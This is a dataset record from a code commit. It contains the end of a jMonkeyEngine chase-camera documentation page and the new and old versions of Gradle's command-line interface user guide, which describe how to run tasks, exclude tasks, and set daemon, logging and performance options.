Camera\n\nTo activate the chase camera, add the following code to your init method (e.g. `simpleInitApp()`). The `target` spatial is typically the player node. You will be able to rotate the target by dragging (keeping the left mouse button pressed and moving the mouse).\n\n[source,java]\n----\n\n\/\/ Disable the default flyby cam\nflyCam.setEnabled(false);\n\/\/ Enable a chase cam for this target (typically the player).\nChaseCamera chaseCam = new ChaseCamera(cam, target, inputManager);\nchaseCam.setSmoothMotion(true);\n\n----\n[cols=\"2\", options=\"header\"]\n|===\n\na|Method\na|Description\n\na|setInvertVerticalAxis(true)\na|Invert the camera's vertical rotation Axis \n\na|setInvertHorizontalAxis(true)\na|Invert the camera's horizontal rotation Axis\n\na|setTrailingEnabled(true)\na|Camera follows the target and flies around and behind when the target moves towards the camera. Trailing only works with smooth motion enabled. (Default)\n\na|setTrailingEnabled(false)\na|Camera follows the target, but does not rotate around the target when the target changes direction.\n\na|setSmoothMotion(true)\na|Activate SmoothMotion when trailing. This means the camera seems to accelerate and fly after the character, when it has caught up, it slows down again.\n\na|setSmoothMotion(false)\na|Disable smooth camera motion. Disabling SmoothMotion also disables trailing.\n\na|setLookAtOffset(Vector3f.UNIT_Y.mult(3))\na|Camera looks at a point 3 world units above the target.\n\na|setToggleRotationTrigger(new MouseButtonTrigger(MouseInput.BUTTON_MIDDLE))\na|Enable rotation by keeping the middle mouse button pressed (like in Blender). This disables the rotation on right and left mouse button click.\n\na|setToggleRotationTrigger(new MouseButtonTrigger(+MouseInput.BUTTON_MIDDLE),+new KeyTrigger(KeyInput.KEY_SPACE))\na|Activate mutiple triggers for the rotation of the camera, e.g. spacebar and middle mouse button, etc.\n\na|setRotationSensitivity(5f)\na|How fast the camera rotates. Use values around <1.0f (all bigger values are ignored).\n\n|===\n\n*Code sample:*\n\n* link:http:\/\/code.google.com\/p\/jmonkeyengine\/source\/browse\/trunk\/engine\/src\/test\/jme3test\/input\/TestChaseCamera.java[TestChaseCamera.java] \u2013 Press the WASD or arrow keys to move. Drag with the left mouse button to rotate.\n\n\n== Which to Choose?\n\nWhat is the difference of the two code samples above?\n[cols=\"2\", options=\"header\"]\n|===\n\na|CameraNode\na|ChaseCam\n\na|Camera follows immediately, flies at same speed as target.\na|Camera moves smoothly and accelerates and decelerates, flies more slowly than the target and catches up.\n\na|Camera stays attached to the target at a constant distance.\na|Camera orbits the target and approaches slowly.\n\na|Drag-to-Rotate rotates the target and the camera. You always see the target from behind.\na|Drag-to-Rotate rotates only the camera. You can see the target from various sides.\n\n|===\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"90479abb9417144c475d01523af399385026e582","subject":"Move common tasks up in CLI docs","message":"Move common tasks up in CLI docs\n\nFixes gradle\/dotorg-docs#155\n\nSigned-off-by: Eric Wendelin <96f164ad4d9b2b0dacf8ebee2bb1eeb3aa69adf1@gradle.com>\n","repos":"lsmaira\/gradle,blindpirate\/gradle,lsmaira\/gradle,gradle\/gradle,robinverduijn\/gradle,blindpirate\/gradle,lsmaira\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,robinverduijn\/gradle,blindpirate\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,lsmaira\/gradle,robinverduijn\/gradle,lsmaira\/gradle,gradle\/gradle,lsmaira\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,blindpirate\/gradle,robinverduijn\/gradle,gradle\/gradle,gradle\/gradle,lsmaira\/gradle,lsmaira\/gradle,robinverduijn\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,robinverduijn\/gradle,lsmaira\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,lsmaira\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/commandLineInterface.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/commandLineInterface.adoc","new_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[command_line_interface]]\n== Command-Line Interface\n\n[.lead]\nThe command-line interface is one of the primary methods of interacting with Gradle. The following serves as a reference of executing and customizing Gradle use of a command-line or when writing scripts or configuring continuous integration.\n\nUse of the <<gradle_wrapper, Gradle Wrapper>> is highly encouraged. You should substitute `.\/gradlew` or `gradlew.bat` for `gradle` in all following examples when using the Wrapper.\n\nExecuting Gradle on the command-line conforms to the following structure. Options are allowed before and after task names.\n----\ngradle [taskName...] [--option-name...]\n----\n\nIf multiple tasks are specified, they should be separated with a space.\n\nOptions that accept values can be specified with or without `=` between the option and argument; however, use of `=` is recommended.\n----\n--console=plain\n----\n\nOptions that enable behavior have long-form options with inverses specified with `--no-`. The following are opposites.\n----\n--build-cache\n--no-build-cache\n----\n\nMany long-form options, have short option equivalents. The following are equivalent:\n----\n--help\n-h\n----\n\n[NOTE]\n====\nMany command-line flags can be specified in `gradle.properties` to avoid needing to be typed. See the <<sec:gradle_configuration_properties, configuring build environment guide>> for details.\n====\n\nThe following sections describe use of the Gradle command-line interface, grouped roughly by user goal. Some plugins also add their own command line options, for example <<test_filtering,`--tests` for Java test filtering>>.\n\n[[sec:command_line_executing_tasks]]\n=== Executing tasks\n\nYou can run a task and all of its dependencies.\n----\n\u276f gradle myTask\n----\n\nYou can learn about what projects and tasks are available in the <<sec:command_line_project_reporting, project reporting section>>.\n\n==== Executing tasks in multi-project builds\nIn a <<intro_multi_project_builds, multi-project build>>, subproject tasks can be executed with \":\" separating subproject name and task name. The following are equivalent _when run from the root project_.\n\n----\n\u276f gradle :mySubproject:taskName\n\u276f gradle mySubproject:taskName\n----\n\nYou can also run a task for all subprojects using the task name only. For example, this will run the \"test\" task for all subprojects when invoked from the root project directory.\n\n----\n\u276f gradle test\n----\n\nWhen invoking Gradle from within a subproject, the project name should be omitted:\n\n----\n\u276f cd mySubproject\n\u276f gradle taskName\n----\n\n[NOTE]\n====\nWhen executing the Gradle Wrapper from subprojects, one must reference `gradlew` relatively. For example: `..\/gradlew taskName`. The community http:\/\/www.gdub.rocks\/[gdub project] aims to make this more convenient.\n====\n\n==== Executing multiple tasks\nYou can also specify multiple tasks. For example, the following will execute the `compile` and `test` tasks in the order that they are listed on the command-line and will also execute the dependencies for each task.\n\n----\n\u276f gradle compile test\n----\n\n[[sec:excluding_tasks_from_the_command_line]]\n==== Excluding tasks from execution\nYou can exclude a task from being executed using the `-x` or `--exclude-task` command-line option and providing the name of the task to exclude.\n\n++++\n<figure>\n <title>Example Task Graph<\/title>\n <imageobject>\n <imagedata fileref=\"img\/commandLineTutorialTasks.png\"\/>\n <\/imageobject>\n<\/figure>\n++++\n\n++++\n<sample id=\"excludeTask\" dir=\"userguide\/tutorial\/excludeTasks\" title=\"Excluding tasks\">\n <output args=\"dist --exclude-task test\"\/>\n<\/sample>\n++++\n\nYou can see that the `test` task is not executed, even though it is a dependency of the `dist` task. The `test` task's dependencies such as `compileTest` are not executed either. Those dependencies of `test` that are required by another task, such as `compile`, are still executed.\n\n[[sec:rerun_tasks]]\n==== Forcing tasks to execute\n\nYou can force Gradle to execute all tasks ignoring <<sec:up_to_date_checks,up-to-date checks>> using the `--rerun-tasks` option:\n\n----\n\u276f gradle test --rerun-tasks\n----\n\nThis will force `test` and _all_ task dependencies of `test` to execute. It's a little like running `gradle clean test`, but without the build's generated output being deleted.\n\n[[sec:continue_build_on_failure]]\n==== Continuing the build when a failure occurs\n\nBy default, Gradle will abort execution and fail the build as soon as any task fails. This allows the build to complete sooner, but hides other failures that would have occurred. In order to discover as many failures as possible in a single build execution, you can use the `--continue` option.\n\n----\n\u276f gradle test --continue\n----\n\nWhen executed with `--continue`, Gradle will execute _every_ task to be executed where all of the dependencies for that task completed without failure, instead of stopping as soon as the first failure is encountered. Each of the encountered failures will be reported at the end of the build.\n\nIf a task fails, any subsequent tasks that were depending on it will not be executed. For example, tests will not run if there is a compilation failure in the code under test; because the test task will depend on the compilation task (either directly or indirectly).\n\n=== Common tasks\n\nThe following are task conventions applied by built-in and most major Gradle plugins.\n\n==== Computing all outputs\n\nIt is common in Gradle builds for the `build` task to designate assembling all outputs and running all checks.\n\n----\n\u276f gradle build\n----\n\n==== Running applications\n\nIt is common for applications to be run with the `run` task, which assembles the application and executes some script or binary.\n\n----\n\u276f gradle run\n----\n\n==== Running all checks\n\nIt is common for _all_ verification tasks, including tests and linting, to be executed using the `check` task.\n\n----\n\u276f gradle check\n----\n\n==== Cleaning outputs\n\nYou can delete the contents of the build directory using the `clean` task, though doing so will cause pre-computed outputs to be lost, causing significant additional build time for the subsequent task execution.\n\n----\n\u276f gradle clean\n----\n\n[[sec:command_line_completion]]\n=== Command-Line completion\n\nGradle provides bash and zsh tab completion support for tasks, options, and Gradle properties through https:\/\/github.com\/gradle\/gradle-completion[gradle-completion], installed separately.\n\n++++\n<figure>\n <title>Gradle Completion<\/title>\n <imageobject>\n <imagedata fileref=\"img\/gradle-completion-4.0.gif\"\/>\n <\/imageobject>\n<\/figure>\n++++\n\n[[sec:command_line_debugging]]\n=== Debugging options\n\n`-?`, `-h`, `--help`::\nShows a help message with all available CLI options.\n\n`-v`, `--version`::\nPrints Gradle, Groovy, Ant, JVM, and operating system version information.\n\n`-S`, `--full-stacktrace`::\nPrint out the full (very verbose) stacktrace for any exceptions. See also <<sec:command_line_logging, logging options>>.\n\n`-s`, `--stacktrace`::\nPrint out the stacktrace also for user exceptions (e.g. compile error). See also <<sec:command_line_logging, logging options>>.\n\n`--scan`::\nCreate a https:\/\/gradle.com\/build-scans[build scan] with fine-grained information about all aspects of your Gradle build.\n\n`-Dorg.gradle.debug=true`::\nDebug Gradle client (non-Daemon) process. Gradle will wait for you to attach a debugger at `localhost:5005` by default.\n\n`-Dorg.gradle.daemon.debug=true`::\nDebug <<gradle_daemon, Gradle Daemon>> process.\n\n[[sec:command_line_performance]]\n=== Performance options\nTry these options when optimizing build performance. Learn more about https:\/\/guides.gradle.org\/performance\/[improving performance of Gradle builds here].\n\nMany of these options can be specified in `gradle.properties` so command-line flags are not necessary. See the <<sec:gradle_configuration_properties, configuring build environment guide>>.\n\n`--build-cache`, `--no-build-cache`::\nToggles the <<build_cache, Gradle build cache>>. Gradle will try to reuse outputs from previous builds. _Default is off_.\n\n`--configure-on-demand`, `--no-configure-on-demand`::\nToggles <<configuration_on_demand, Configure-on-demand>>. Only relevant projects are configured in this build run. _Default is off_.\n\n`--max-workers`::\nSets maximum number of workers that Gradle may use. _Default is number of processors_.\n\n`--parallel`, `--no-parallel`::\nBuild projects in parallel. For limitations of this option please see <<sec:parallel_execution>>. _Default is off_.\n\n`--profile`::\nGenerates a high-level performance report in the `$buildDir\/reports\/profile` directory. `--scan` is preferred.\n\n`--scan`::\nGenerate a build scan with detailed performance diagnostics.\n\nimage:img\/gradle-core-test-build-scan-performance.png[Build Scan performance report]\n\n==== Gradle daemon options\nYou can manage the <<gradle_daemon,Gradle Daemon>> through the following command line options.\n\n`--daemon`, `--no-daemon`::\nUse the <<gradle_daemon, Gradle Daemon>> to run the build. Starts the daemon if not running or existing daemon busy. _Default is on_.\n\n`--foreground`::\nStarts the Gradle Daemon in a foreground process.\n\n`--status` (Standalone command)::\nRun `gradle --status` to list running and recently stopped Gradle daemons. Only displays daemons of the same Gradle version.\n\n`--stop` (Standalone command)::\nRun `gradle --stop` to stop all Gradle Daemons of the same version.\n\n`-Dorg.gradle.daemon.idletimeout=(number of milliseconds)`::\nGradle Daemon will stop itself after this number of milliseconds of idle time. _Default is 10800000_ (3 hours).\n\n\n[[sec:command_line_logging]]\n=== Logging options\n\n==== Setting log level\nYou can customize the verbosity of Gradle logging with the following options, ordered from least verbose to most verbose. Learn more in the <<logging, logging documentation>>.\n\n`-Dorg.gradle.logging.level=(quiet,warn,lifecycle,info,debug)`::\nSet logging level via Gradle properties.\n\n`-q`, `--quiet`::\nLog errors only.\n\n`-w`, `--warn`::\nSet log level to warn.\n\n`-i`, `--info`::\nSet log level to info.\n\n`-d`, `--debug`::\nLog in debug mode (includes normal stacktrace).\n\nLifecycle is the default log level.\n\n==== Customizing log format\nYou can control the use of rich output (colors and font variants) by specifying the \"console\" mode in the following ways:\n\n`-Dorg.gradle.console=(auto,plain,rich,verbose)`::\nSpecify console mode via Gradle properties. Different modes described immediately below.\n\n`--console=(auto,plain,rich,verbose)`::\nSpecifies which type of console output to generate.\n+\nSet to `plain` to generate plain text only. This option disables all color and other rich output in the console output. This is the default when Gradle is _not_ attached to a terminal.\n+\nSet to `auto` (the default) to enable color and other rich output in the console output when the build process is attached to a console, or to generate plain text only when not attached to a console. _This is the default when Gradle is attached to a terminal._\n+\nSet to `rich` to enable color and other rich output in the console output, regardless of whether the build process is not attached to a console. When not attached to a console, the build output will use ANSI control characters to generate the rich output.\n+\nSet to `verbose` to enable color and other rich output like the `rich`, but output task names and outcomes at the lifecycle log level, as is done by default in Gradle 3.5 and earlier.\n\n==== Showing or hiding warnings\nBy default, Gradle won't display all warnings (e.g. deprecation warnings). Instead, Gradle will collect them and render a summary at the end of the build like:\n\n----\nThere're <number> deprecation warnings, which may break the build in Gradle 5.0. Please run with --warning-mode=all to see them.\n----\n\nYou can control the verbosity of warnings on the console with the following options:\n\n`-Dorg.gradle.warning.mode=(all,none,summary)`::\nSpecify warning mode via <<sec:gradle_properties, Gradle properties>>. Different modes described immediately below.\n\n`--warning-mode=(all,none,summary)`::\nSpecifies how to log warnings. Default is `summary`.\n+\nSet to `all` to log all warnings.\n+\nSet to `summary` to suppress all warnings and log a summary at the end of the build.\n+\nSet to `none` to suppress all warnings, including the summary at the end of the build.\n\n==== Rich Console\nGradle's rich console displays extra information while builds are running.\n\nimage::img\/rich-cli.png[alt=\"Gradle Rich Console\"]\n\nFeatures:\n\n * Logs above grouped by task that generated them\n * Progress bar and timer visually describe overall status\n * Parallel work-in-progress lines below describe what is happening now\n\n[[sec:command_line_execution_options]]\n=== Execution options\nThe following options affect how builds are executed, by changing what is built or how dependencies are resolved.\n\n`--include-build`::\nRun the build as a composite, including the specified build. See <<composite_builds, Composite Builds>>.\n\n`--offline`::\nSpecifies that the build should operate without accessing network resources. Learn more about <<cache_command_line_options,options to override dependency caching>>.\n\n`--refresh-dependencies`::\nRefresh the state of dependencies. Learn more about how to use this in the dependency management docs.<<cache_command_line_options, dependency management docs>>.\n\n`--dry-run`::\nRun Gradle with all task actions disabled. Use this to show which task would have executed.\n\n[[sec:command_line_bootstrapping_projects]]\n=== Bootstrapping new projects\n\n==== Creating new Gradle builds\nUse the built-in `gradle init` task to create a new Gradle builds, with new or existing projects.\n\n----\n\u276f gradle init\n----\n\nMost of the time you'll want to specify a project type. Available types include `basic` (default), `java-library`, `java-application`, and more. See <<build_init_plugin, init plugin documentation>> for details.\n\n----\n\u276f gradle init --type java-library\n----\n\n==== Standardize and provision Gradle\nThe built-in `gradle wrapper` task generates a script, `gradlew`, that invokes a declared version of Gradle, downloading it beforehand if necessary.\n\n----\n\u276f gradle wrapper --gradle-version=4.4\n----\n\nYou can also specify `--distribution-type=(bin|all)`, `--gradle-distribution-url`, `--gradle-distribution-sha256-sum` in addition to `--gradle-version`. Full details on how to use these options are documented in the <<gradle_wrapper,Gradle wrapper section>>.\n\n=== Environment options\nYou can customize many aspects about where build scripts, settings, caches, and so on through the options below. Learn more about customizing your <<build_environment, build environment>>.\n\n`-b`, `--build-file`::\nSpecifies the build file. For example: `gradle --build-file=foo.gradle`. The default is `build.gradle`, then `build.gradle.kts`, then `myProjectName.gradle`.\n\n`-c`, `--settings-file`::\nSpecifies the settings file. For example: `gradle --settings-file=somewhere\/else\/settings.gradle`\n\n`-g`, `--gradle-user-home`::\nSpecifies the Gradle user home directory. The default is the `.gradle` directory in the user's home directory.\n\n`-p`, `--project-dir`::\nSpecifies the start directory for Gradle. Defaults to current directory.\n\n`--project-cache-dir`::\nSpecifies the project-specific cache directory. Default value is `.gradle` in the root project directory.\n\n`-u`, `--no-search-upward` (deprecated)::\nDon't search in parent directories for a `settings.gradle` file.\n\n`-D`, `--system-prop`::\nSets a system property of the JVM, for example `-Dmyprop=myvalue`. See <<sec:gradle_system_properties>>.\n\n`-I`, `--init-script`::\nSpecifies an initialization script. See <<init_scripts>>.\n\n`-P`, `--project-prop`::\nSets a project property of the root project, for example `-Pmyprop=myvalue`. See <<sec:project_properties>>.\n\n`-Dorg.gradle.jvmargs`::\nSet JVM arguments.\n\n`-Dorg.gradle.java.home`::\nSet JDK home dir.\n\n[[sec:command_line_project_reporting]]\n=== Project reporting\n\nGradle provides several built-in tasks which show particular details of your build. This can be useful for understanding the structure and dependencies of your build, and for debugging problems.\n\nYou can get basic help about available reporting options using `gradle help`.\n\n==== Listing projects\n\nRunning `gradle projects` gives you a list of the sub-projects of the selected project, displayed in a hierarchy.\n\n----\n\u276f gradle projects\n----\n\nYou also get a project report within build scans. Learn more about https:\/\/guides.gradle.org\/creating-build-scans\/[creating build scans].\n\n==== Listing tasks\n\nRunning `gradle tasks` gives you a list of the main tasks of the selected project. This report shows the default tasks for the project, if any, and a description for each task.\n\n----\n\u276f gradle tasks\n----\n\nBy default, this report shows only those tasks which have been assigned to a task group. You can obtain more information in the task listing using the `--all` option.\n\n----\n\u276f gradle tasks --all\n----\n\n[[sec:show_task_details]]\n==== Show task usage details\n\nRunning `gradle help --task someTask` gives you detailed information about a specific task.\n\n++++\n<sample id=\"taskHelp\" dir=\"userguide\/tutorial\/projectReports\" title=\"Obtaining detailed help for tasks\">\n <output args=\"-q help --task libs\"\/>\n<\/sample>\n++++\n\nThis information includes the full task path, the task type, possible command line options and the description of the given task.\n\n==== Reporting dependencies\n\nBuild scans give a full, visual report of what project and binary dependencies exist on which configurations, transitive dependencies, and dependency version selection.\n\n----\n\u276f gradle myTask --scan\n----\n\nThis will give you a link to a web-based report, where you can find dependency information like this.\n\nimage::img\/gradle-core-test-build-scan-dependencies.png[Build Scan dependencies report]\n\n==== Listing project dependencies\n\nRunning `gradle dependencies` gives you a list of the dependencies of the selected project, broken down by configuration. For each configuration, the direct and transitive dependencies of that configuration are shown in a tree. Below is an example of this report:\n\n----\n\u276f gradle dependencies\n----\n\nRunning `gradle buildEnvironment` visualises the buildscript dependencies of the selected project, similarly to how `gradle dependencies` visualizes the dependencies of the software being built.\n\n----\n\u276f gradle buildEnvironment\n----\n\nRunning `gradle dependencyInsight` gives you an insight into a particular dependency (or dependencies) that match specified input.\n\n----\n\u276f gradle dependencyInsight\n----\n\nSince a dependency report can get large, it can be useful to restrict the report to a particular configuration. This is achieved with the optional `--configuration` parameter:\n\n++++\n<sample id=\"dependencyListReportFiltered\" dir=\"userguide\/tutorial\/projectReports\" title=\"Filtering dependency report by configuration\">\n <output args=\"-q api:dependencies --configuration testCompile\"\/>\n<\/sample>\n++++\n\n[[sec:listing_properties]]\n==== Listing project properties\n\nRunning `gradle properties` gives you a list of the properties of the selected project.\n\n++++\n<sample id=\"propertyListReport\" dir=\"userguide\/tutorial\/projectReports\" title=\"Information about properties\">\n <output args=\"-q api:properties\" ignoreExtraLines=\"true\"\/>\n<\/sample>\n++++\n\n==== Software Model reports\n\nYou can get a hierarchical view of elements for <<software_model,software model>> projects (deprecated) using the `model` task:\n\n----\n\u276f gradle model\n----\n\nLearn more about <<model-report,the model report>> in the software model documentation.\n","old_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[command_line_interface]]\n== Command-Line Interface\n\n[.lead]\nThe command-line interface is one of the primary methods of interacting with Gradle. The following serves as a reference of executing and customizing Gradle use of a command-line or when writing scripts or configuring continuous integration.\n\nUse of the <<gradle_wrapper, Gradle Wrapper>> is highly encouraged. You should substitute `.\/gradlew` or `gradlew.bat` for `gradle` in all following examples when using the Wrapper.\n\nExecuting Gradle on the command-line conforms to the following structure. Options are allowed before and after task names.\n----\ngradle [taskName...] [--option-name...]\n----\n\nIf multiple tasks are specified, they should be separated with a space.\n\nOptions that accept values can be specified with or without `=` between the option and argument; however, use of `=` is recommended.\n----\n--console=plain\n----\n\nOptions that enable behavior have long-form options with inverses specified with `--no-`. The following are opposites.\n----\n--build-cache\n--no-build-cache\n----\n\nMany long-form options, have short option equivalents. The following are equivalent:\n----\n--help\n-h\n----\n\n[NOTE]\n====\nMany command-line flags can be specified in `gradle.properties` to avoid needing to be typed. See the <<sec:gradle_configuration_properties, configuring build environment guide>> for details.\n====\n\nThe following sections describe use of the Gradle command-line interface, grouped roughly by user goal. Some plugins also add their own command line options, for example <<test_filtering,`--tests` for Java test filtering>>.\n\n[[sec:command_line_executing_tasks]]\n=== Executing tasks\n\nYou can run a task and all of its dependencies.\n----\n\u276f gradle myTask\n----\n\nYou can learn about what projects and tasks are available in the <<sec:command_line_project_reporting, project reporting section>>.\n\n==== Executing tasks in multi-project builds\nIn a <<intro_multi_project_builds, multi-project build>>, subproject tasks can be executed with \":\" separating subproject name and task name. The following are equivalent _when run from the root project_.\n\n----\n\u276f gradle :mySubproject:taskName\n\u276f gradle mySubproject:taskName\n----\n\nYou can also run a task for all subprojects using the task name only. For example, this will run the \"test\" task for all subprojects when invoked from the root project directory.\n\n----\n\u276f gradle test\n----\n\nWhen invoking Gradle from within a subproject, the project name should be omitted:\n\n----\n\u276f cd mySubproject\n\u276f gradle taskName\n----\n\n[NOTE]\n====\nWhen executing the Gradle Wrapper from subprojects, one must reference `gradlew` relatively. For example: `..\/gradlew taskName`. The community http:\/\/www.gdub.rocks\/[gdub project] aims to make this more convenient.\n====\n\n==== Executing multiple tasks\nYou can also specify multiple tasks. For example, the following will execute the `compile` and `test` tasks in the order that they are listed on the command-line and will also execute the dependencies for each task.\n\n----\n\u276f gradle compile test\n----\n\n[[sec:excluding_tasks_from_the_command_line]]\n==== Excluding tasks from execution\nYou can exclude a task from being executed using the `-x` or `--exclude-task` command-line option and providing the name of the task to exclude.\n\n++++\n<figure>\n <title>Example Task Graph<\/title>\n <imageobject>\n <imagedata fileref=\"img\/commandLineTutorialTasks.png\"\/>\n <\/imageobject>\n<\/figure>\n++++\n\n++++\n<sample id=\"excludeTask\" dir=\"userguide\/tutorial\/excludeTasks\" title=\"Excluding tasks\">\n <output args=\"dist --exclude-task test\"\/>\n<\/sample>\n++++\n\nYou can see that the `test` task is not executed, even though it is a dependency of the `dist` task. The `test` task's dependencies such as `compileTest` are not executed either. Those dependencies of `test` that are required by another task, such as `compile`, are still executed.\n\n[[sec:rerun_tasks]]\n==== Forcing tasks to execute\n\nYou can force Gradle to execute all tasks ignoring <<sec:up_to_date_checks,up-to-date checks>> using the `--rerun-tasks` option:\n\n----\n\u276f gradle test --rerun-tasks\n----\n\nThis will force `test` and _all_ task dependencies of `test` to execute. It's a little like running `gradle clean test`, but without the build's generated output being deleted.\n\n[[sec:continue_build_on_failure]]\n==== Continuing the build when a failure occurs\n\nBy default, Gradle will abort execution and fail the build as soon as any task fails. This allows the build to complete sooner, but hides other failures that would have occurred. In order to discover as many failures as possible in a single build execution, you can use the `--continue` option.\n\n----\n\u276f gradle test --continue\n----\n\nWhen executed with `--continue`, Gradle will execute _every_ task to be executed where all of the dependencies for that task completed without failure, instead of stopping as soon as the first failure is encountered. Each of the encountered failures will be reported at the end of the build.\n\nIf a task fails, any subsequent tasks that were depending on it will not be executed. For example, tests will not run if there is a compilation failure in the code under test; because the test task will depend on the compilation task (either directly or indirectly).\n\n[[sec:command_line_completion]]\n=== Command-Line completion\n\nGradle provides bash and zsh tab completion support for tasks, options, and Gradle properties through https:\/\/github.com\/gradle\/gradle-completion[gradle-completion], installed separately.\n\n++++\n<figure>\n <title>Gradle Completion<\/title>\n <imageobject>\n <imagedata fileref=\"img\/gradle-completion-4.0.gif\"\/>\n <\/imageobject>\n<\/figure>\n++++\n\n[[sec:command_line_debugging]]\n=== Debugging options\n\n`-?`, `-h`, `--help`::\nShows a help message with all available CLI options.\n\n`-v`, `--version`::\nPrints Gradle, Groovy, Ant, JVM, and operating system version information.\n\n`-S`, `--full-stacktrace`::\nPrint out the full (very verbose) stacktrace for any exceptions. See also <<sec:command_line_logging, logging options>>.\n\n`-s`, `--stacktrace`::\nPrint out the stacktrace also for user exceptions (e.g. compile error). See also <<sec:command_line_logging, logging options>>.\n\n`--scan`::\nCreate a https:\/\/gradle.com\/build-scans[build scan] with fine-grained information about all aspects of your Gradle build.\n\n`-Dorg.gradle.debug=true`::\nDebug Gradle client (non-Daemon) process. Gradle will wait for you to attach a debugger at `localhost:5005` by default.\n\n`-Dorg.gradle.daemon.debug=true`::\nDebug <<gradle_daemon, Gradle Daemon>> process.\n\n[[sec:command_line_performance]]\n=== Performance options\nTry these options when optimizing build performance. Learn more about https:\/\/guides.gradle.org\/performance\/[improving performance of Gradle builds here].\n\nMany of these options can be specified in `gradle.properties` so command-line flags are not necessary. See the <<sec:gradle_configuration_properties, configuring build environment guide>>.\n\n`--build-cache`, `--no-build-cache`::\nToggles the <<build_cache, Gradle build cache>>. Gradle will try to reuse outputs from previous builds. _Default is off_.\n\n`--configure-on-demand`, `--no-configure-on-demand`::\nToggles <<configuration_on_demand, Configure-on-demand>>. Only relevant projects are configured in this build run. _Default is off_.\n\n`--max-workers`::\nSets maximum number of workers that Gradle may use. _Default is number of processors_.\n\n`--parallel`, `--no-parallel`::\nBuild projects in parallel. For limitations of this option please see <<sec:parallel_execution>>. _Default is off_.\n\n`--profile`::\nGenerates a high-level performance report in the `$buildDir\/reports\/profile` directory. `--scan` is preferred.\n\n`--scan`::\nGenerate a build scan with detailed performance diagnostics.\n\nimage:img\/gradle-core-test-build-scan-performance.png[Build Scan performance report]\n\n==== Gradle daemon options\nYou can manage the <<gradle_daemon,Gradle Daemon>> through the following command line options.\n\n`--daemon`, `--no-daemon`::\nUse the <<gradle_daemon, Gradle Daemon>> to run the build. Starts the daemon if not running or existing daemon busy. _Default is on_.\n\n`--foreground`::\nStarts the Gradle Daemon in a foreground process.\n\n`--status` (Standalone command)::\nRun `gradle --status` to list running and recently stopped Gradle daemons. Only displays daemons of the same Gradle version.\n\n`--stop` (Standalone command)::\nRun `gradle --stop` to stop all Gradle Daemons of the same version.\n\n`-Dorg.gradle.daemon.idletimeout=(number of milliseconds)`::\nGradle Daemon will stop itself after this number of milliseconds of idle time. _Default is 10800000_ (3 hours).\n\n\n[[sec:command_line_logging]]\n=== Logging options\n\n==== Setting log level\nYou can customize the verbosity of Gradle logging with the following options, ordered from least verbose to most verbose. Learn more in the <<logging, logging documentation>>.\n\n`-Dorg.gradle.logging.level=(quiet,warn,lifecycle,info,debug)`::\nSet logging level via Gradle properties.\n\n`-q`, `--quiet`::\nLog errors only.\n\n`-w`, `--warn`::\nSet log level to warn.\n\n`-i`, `--info`::\nSet log level to info.\n\n`-d`, `--debug`::\nLog in debug mode (includes normal stacktrace).\n\nLifecycle is the default log level.\n\n==== Customizing log format\nYou can control the use of rich output (colors and font variants) by specifying the \"console\" mode in the following ways:\n\n`-Dorg.gradle.console=(auto,plain,rich,verbose)`::\nSpecify console mode via Gradle properties. Different modes described immediately below.\n\n`--console=(auto,plain,rich,verbose)`::\nSpecifies which type of console output to generate.\n+\nSet to `plain` to generate plain text only. This option disables all color and other rich output in the console output. This is the default when Gradle is _not_ attached to a terminal.\n+\nSet to `auto` (the default) to enable color and other rich output in the console output when the build process is attached to a console, or to generate plain text only when not attached to a console. _This is the default when Gradle is attached to a terminal._\n+\nSet to `rich` to enable color and other rich output in the console output, regardless of whether the build process is not attached to a console. When not attached to a console, the build output will use ANSI control characters to generate the rich output.\n+\nSet to `verbose` to enable color and other rich output like the `rich`, but output task names and outcomes at the lifecycle log level, as is done by default in Gradle 3.5 and earlier.\n\n==== Showing or hiding warnings\nBy default, Gradle won't display all warnings (e.g. deprecation warnings). Instead, Gradle will collect them and render a summary at the end of the build like:\n\n----\nThere're <number> deprecation warnings, which may break the build in Gradle 5.0. Please run with --warning-mode=all to see them.\n----\n\nYou can control the verbosity of warnings on the console with the following options:\n\n`-Dorg.gradle.warning.mode=(all,none,summary)`::\nSpecify warning mode via <<sec:gradle_properties, Gradle properties>>. Different modes described immediately below.\n\n`--warning-mode=(all,none,summary)`::\nSpecifies how to log warnings. Default is `summary`.\n+\nSet to `all` to log all warnings.\n+\nSet to `summary` to suppress all warnings and log a summary at the end of the build.\n+\nSet to `none` to suppress all warnings, including the summary at the end of the build.\n\n==== Rich Console\nGradle's rich console displays extra information while builds are running.\n\nimage::img\/rich-cli.png[alt=\"Gradle Rich Console\"]\n\nFeatures:\n\n * Logs above grouped by task that generated them\n * Progress bar and timer visually describe overall status\n * Parallel work-in-progress lines below describe what is happening now\n\n[[sec:command_line_execution_options]]\n=== Execution options\nThe following options affect how builds are executed, by changing what is built or how dependencies are resolved.\n\n`--include-build`::\nRun the build as a composite, including the specified build. See <<composite_builds, Composite 